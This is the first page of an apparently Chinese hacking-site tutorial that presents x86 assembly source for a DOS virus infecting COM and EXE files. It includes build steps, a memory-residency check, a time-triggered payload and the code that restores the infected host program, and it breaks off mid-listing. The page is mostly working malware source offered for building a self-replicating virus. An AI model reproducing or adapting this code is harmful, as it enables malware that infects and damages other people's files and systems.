编写感染COM与EXE文件的病毒的样例程序

• ;此程序是d由v0病毒改装升级而来
  ;在DOS下才有一定的传染能力
  ;此程序部分应用了32位编程
  ;制作方法如下
  ;tasm32 dv1;
  ;tlink dv1;
  ;Debug dv1.exe
  ;-n dv1.com
  ;-w
  ;-q
  ;最后生成dv1.com病毒程序
  OFF equ Offset
  DosMcb StrUC ;Dos内存控制链结构（部分）
  Flag db ? ;是'M'则不是最后一块；是 'Z'则是最后一块
  Owner dw ? ;是008: 则是系统所有；是0则为未使用内存块
  Sizes dw ? ;本块大小，按节计算（1节=10h字节）
  DosMcb Ends
  ExeHeader Struc ;Exe文件头结构
  Flags dw 'ZM';Exe文件标志
  ModSize dw ? ;Exe文件最后一页字节数
  Pages dw ? ;Exe文件页数（1页为512字节）
  Reloc dw ? ;Exe文件从定位项数
  MeSize dw ? ;本文头节数
  MinMem dw ? ;该程序所须最小内存（节）
  MaxMem dw ? ;该程序所须最大内存（节）
  StartSs dw ? ;程序Sp初值
  StartSp dw ? ;程序相对Ss初值
  CheckSum dw ? ;文件头检查和
  StartIp dw ? ;程序Ip初值
  StartCs dw ? ;程序相对Cs初值
  RelocOff dw ? ;从定位信息偏移
  ExeHeader Ends
  VirusSize=OFF @@End-OFF @@Start ；（病毒大小）
  VirusMemSize=OFF @@MemEnd-OFF @@Start ；（病毒需要的内存大小）
  .386
  .model small
  .code
  org 100h ;按COM格式编写
  @@Start: ;病毒引导块
  pusha ;保存所有通用寄存器
  mov ax,4d4dh
  int 21h ;是否已经驻留内存(自定义中断）
  cmp ax,4d4dh
  jz short @@ExecOldApp ;否,调用安装模块
  call @@Install
  @@ExecOldApp:
  mov ah,2ch
  int 21h ;得到系统时间
  cmp cx,22*100h+30 ;（Cmp 时间：22：30）
  jb short @@TestFlag ;不到22：30不调用显示消息
  call @@DisplayMsg ;调用表现块
  @@TestFlag:
  clc ;预设为Clc指令，表示是Com文件（若在传染时被改成Stc则是Exe文件）
  jc short @@IsExeApp
  @@IsComApp:
  call @@GetOldComAppCode
  OldAppCode dw 20cdh ;20cdh恰是Int 20h指令，用以返回Dos
  dw 0000h ;这里为保存原COM文件头部4字节信息
  @@GetOldComAppCode:
  pop si ;得到OldAppCode的地址
  mov di,100h
  cld
  lodsd
  stosd ;恢复原COM头部4字节
  popa ;恢复所有通用寄器
  push Word ptr 100h
  ret ;去执行原COM程序
  @@IsExeApp:
  popa ;恢复所有通用寄器
  cli ;改变堆栈指针时要关闭中断
  
  mov sp,es ;得到Psp（ Sp=PSP段址）
  add sp,10h
  SpAddData dw 0c481h;0bch是add sp,xxxx指令
  OldAppSs dw 000h ;原Exe文件Ss相对值
  
• [1] [2] [3] [4] [5] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 编写感染COM与EXE文件的病毒的样例程序 相关文章：
• ·Java编写的计算器程序及源代码（1）
• ·C#编写的windows计算器-源代码
• ·Windows下C语言网络编程快速入门
• ·VBA编程简化Excel操作的两个实例
• ·ASP.NET2.0下含有DropDownList的GridView编辑、删除的完整例子！
• ·Windows编程基础 - 概述
• ·深入浅出.NET泛型编程
• ·linux内核编译详解
• ·WINDOWS编程基础
• ·剪辑数字影像 影像编辑软件大荟萃
• 编写感染COM与EXE文件的病毒的样例程序 相关软件
• ·C语言编程宝典之一
• ·《雅奇MIS》可视化自动编程系统 V10.0
• ·MathType 数学公式编辑器 V5.2 汉化版
• ·delphi编程手册 V3.0
• ·Lrc歌词编辑器2006 V12.26
• ·Autop+线切割编程系统 V4.47
• ·vc-mfc编程实例
• ·姑妄言汇编
• ·ICO图标提取编辑专家 V4.7
• ·JP-Word简谱编辑 V3.0

上一篇:用批处理法快速安装Windows系统(2)

下一篇:打造最隐蔽的文件夹选项

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐